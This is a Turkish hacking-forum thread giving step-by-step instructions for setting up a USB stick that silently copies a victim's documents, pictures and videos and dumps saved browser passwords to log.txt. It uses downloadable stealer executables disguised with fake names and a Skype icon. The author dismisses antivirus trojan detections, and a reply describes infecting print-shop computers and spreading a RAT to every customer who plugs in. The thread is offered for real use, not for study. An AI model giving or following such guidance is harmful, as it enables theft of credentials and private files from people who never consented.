[BOMBA KONU] Usb ile Otomatik Şifre ve Dosya Çalma

Sheldon

Katılımcı Üye
13 Ocak 2018
939
138
-
gerekli programlar ve donanımlar:

Herhangi bir flash bellek (usb)
Usb stealer.exe
Webrowser.exe
ve korkusuz yazar adlı bir siteden alıntıladığım usb hızlandırıcı.exe

Merak etmeyin HEPSİ İNDİRME LİNKİNDE VAR
Reklam değildir

Adım adım anlatacağım indirme linki aşağıda. Rar pass yoktur

1. Adım :Alttaki linkten dosyayı indirin
2.masaüstüne atın
3.buraya çıkar diyin
4.sonra flash belleği takın ve içinde usbac adlı program hariç hepsini flasha atın (flashta yeni klasör oluşturup içine atın şüphe uyandırmasın) diye 5.sonra usbac a çift tıklayın ve kurulum yapın
6.daha sonra bi uygulama açılacak yani bu ( kurduğunuz uygulama )
7.ordan flasha attığınız uygulamalardan EverestMausesettings.exe seçin (Browse tuşu ile)
8.bu ilk kısımdan sonra bi altındaki yere gelin browse yazan yere tıklayın ve usb yi seçin klasörleri değil direk usb yani flash bellek
9.sonra alt da icon yazan yere herhangi bi ikon seçin inandırıcı olsun ben size koydum skype ikonu ve bu ikon usb default ikonunuzu da değiştiricek

10.altındaki yerede istediğinizi yazın ama dikkat ne yazarsanız flash bellek ismi o olacaktır en son create basın ve işiniz tamam oluşturduktan sonra test amaçlı flashı çıkarıp takın sizde göreceksiniz

Not:Burada uygulama isimleri tarafımca sizler için inandırıcı olsu diye değiştirilmiştir
Önemli nokta: Everest ile başlayan uygulama bilgisayarın DOWNLOADS PİCTURES, VİDEOS ,BELGELER klasörlerindeki herşeyi otomatik kopyalar
Sony ile başlayan uygulama Tüm tarayıcılardaki kayıtlı şifreleri log.txt adlı dosya oluşturum ona kaydeder

SON ÖNEMLİ UYARI: Burada 2 adet exe uygulaması var yukarda yazdıklarımı yaptıktan sona aynısını 7. adımdan itibaren Sony ile başlayan uygulamaya yapınız aksi taktirde sadece biri çalışır VİRÜS ALGILAYABİLİR ÇÜNKÜ BU UYGULAMALAR BİR PASSWORD STEAL (ŞİFRE ÇALMA)
YAZILIMIDIR LAKİN KESİNLİKLE VİRÜS YOKTUR

KONUDA HİÇBİRŞEY ALINTI DEĞİLDİR KONU VE YÖNTEM TAMAMEN BANA AİTTİR HİÇBİR ŞEKİLDE SORUMLULUK KABUL ETMİYORUM

indirme linki arkadaşlar emek olan bir konu bu yüzden kısalttım
Link 1 : İndir zip
VT :https://www.virustotal.com/gui/file...0fdb658adc646f136995f4a6762ee9f2236/detection
VT 44 tane TROJEN BACKDOORBOT VE PASSWORD STEAL BULMUŞ ARKADAŞLAR SONUÇTA BİLGİSYARA ERİŞİYORUZ BUNA GÖRE BULMASI GAYET NORMALDİR

konu yeri yanlışsa çöpe değil mümkünse doğru yere taşıyabilirsiniz moderatör arkadaşlar

Not3 : Burda ekstra yazılım kurmamızın sebebi windowsta autorun özelliği devre dışı olduğu için bu yöntemle tüm windows serilerinde yapabilirsiniz.
İstediğiniz ikonu bulma sitesi :https://www.iconfinder.com

İyi forumlar

ch_arli41 H A

Senaryo:

Bu yöntemi sıkça kullanırım
Yukarıdaki işlemleri yapınca bir klasör oluşturun belleğinize ve adını ÖDEVLER yapın içine de internetten bulduğunuz mesela X. sınıfa gidiyorsunuz yada Üniversitede X bölümünü okuyorsunuz googleye bununla ilgili resimler bulun mesela 5.sınıf türkçe 11.sınıf Edebiyat
12. sınıf logaritma integral vb. ve bununla ilgi resimleri indirip yeni açtığınız klasöre koyun ve kırtasiyeye gidin ve çıktı çıkarmak istediğinizi söyleyin belleği o da taksa sizde taksanız farketmez ve çıktınızı alın
Sonuç:
Maliyet 25-50 en fazla 75 kuruş
Kazanç : O bilgisayara sahipsiniz kar yapmak için tarayıcı ayarlarından her tarayıcısını açtığında kısaltımlmış bir linke gitmesini sağlayarak kar bile yaparsınız
yada maillerine dahil eriştiğiniz için aynı işlemi bu seferde RAT ile yaparsınız ve kırtasiyeye USB takan herkese RAT bulaştırabilirsiniz

Sorumluluk Kabul etmem

Son düzenleme:

3l4ar

Yeni üye
29 Şub 2020
10
1
Cevap: USB ile TÜM DOSYALARI VE TARAYICI ŞİFRELERİNİ OTOMATİK ÇALMA

Ellerine sağlık reis,güzel olmuş

The Coηq

Uzman üye
30 Tem 2019
1,791
45
Cevap: USB ile TÜM DOSYALARI VE TARAYICI ŞİFRELERİNİ OTOMATİK ÇALMA

Eline sağlık :))

H A

Katılımcı Üye
10 Tem 2019
850
27
KIBRIS
Bilgi gayet güzel,sosyal mühendislik yoluyla tüm sisteme girilebilir,bunun hakkında bir de senaryo alırsak tadından yenmez.

Quey87

Katılımcı Üye
11 Ağu 2018
415
10
Texas
flash bellek başka bir bilgisayara takılırsa o program çalışmaz, windows autorun desteğine windows xp ile veda etti diye biliyorum.
sen burda autorun'un aktif olması için program yükledin ve işlemleri yaptın, kendi bilgisayarıdna denediğinde olumlu sonuç aldın fakat başka birisinin bilgisayarında denersen o bilgisayarda autorun programı olmadığı için çalışmayacak maalesef :(

H A

Katılımcı Üye
10 Tem 2019
850
27
KIBRIS
flash bellek başka bir bilgisayara takılırsa o program çalışmaz, windows autorun desteğine windows xp ile veda etti diye biliyorum.
sen burda autorun'un aktif olması için program yükledin ve işlemleri yaptın, kendi bilgisayarıdna denediğinde olumlu sonuç aldın fakat başka birisinin bilgisayarında denersen o bilgisayarda autorun programı olmadığı için çalışmayacak maalesef :(

Port denilen birşey var demi ? :)

Sheldon

Katılımcı Üye
13 Ocak 2018
939
138
-
bu uygulamayla nasıl port kullancağız ki ? konu sahibi buna değinmemiş

Dostum birincisi ben ratı örnek olsun diye verdim konu haricinde
Quey87
İkincisi zaten autorun desteği kesilmese bunlara gerek yoktu. Kesildiği için Flash belleğe extra olarak bir yazılım yükleyip bu yazılım vesilesiyle flash belleği takınca program vasıtasıyla seçtiğimiz dosyanın çalışabileceği bir yazılım haline getirdik

Burda dikkat etmen şu ben bilgisayarıma autorun KURMADIM

Sheldon

Katılımcı Üye
13 Ocak 2018
939
138
-
sen burda autorun'un aktif olması için program yükledin ve işlemleri yaptın, kendi bilgisayarıdna denediğinde olumlu sonuç aldın :(

Hatan burda bu bahsi geçen program auto run aktif etmek amaçlı bir yazılım değil bir
iki aktif de etmiyor bu yöntemi deneyin sonra başka bir flash belleğe auto run dosyası oluştup takarsan çalışmayacaktır destek kesili olduğu için

Son düzenleme:

Sheldon

Katılımcı Üye
13 Ocak 2018
939
138
-
bende senin tarafındayım da, her şeyi doğru yaptım sonra:
o usb autorun creator programını sildim, ondan sonra taktım, çalışmadı.

Peki.Bana konuyla ilgili en son işlemleri yaptığın bir video ile özelden ulaşırmısın? belki bir yerde hata yapıyoruzdur
Quey87

`AJAX

Katılımcı Üye
21 Haz 2019
398
7
Eline sağlık çok güzel konu ama bende şifreler hariç herşeyi kopyaladı ve hala kopyalıyor :mahcup şifreler hangi bölümde çıkıcak?

Sheldon

Katılımcı Üye
13 Ocak 2018
939
138
-
Eline sağlık çok güzel konu ama bende şifreler hariç herşeyi kopyaladı ve hala kopyalıyor :mahcup şifreler hangi bölümde çıkıcak?

Demek ikisinide yapmışsın
usb'nde
Log.txt yazan yerde tarayıcı şifreleri var
kopyalamayı durdurmak için flashı çıkar tak sonra silebilirisn
SuperNoobs

Son düzenleme:

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.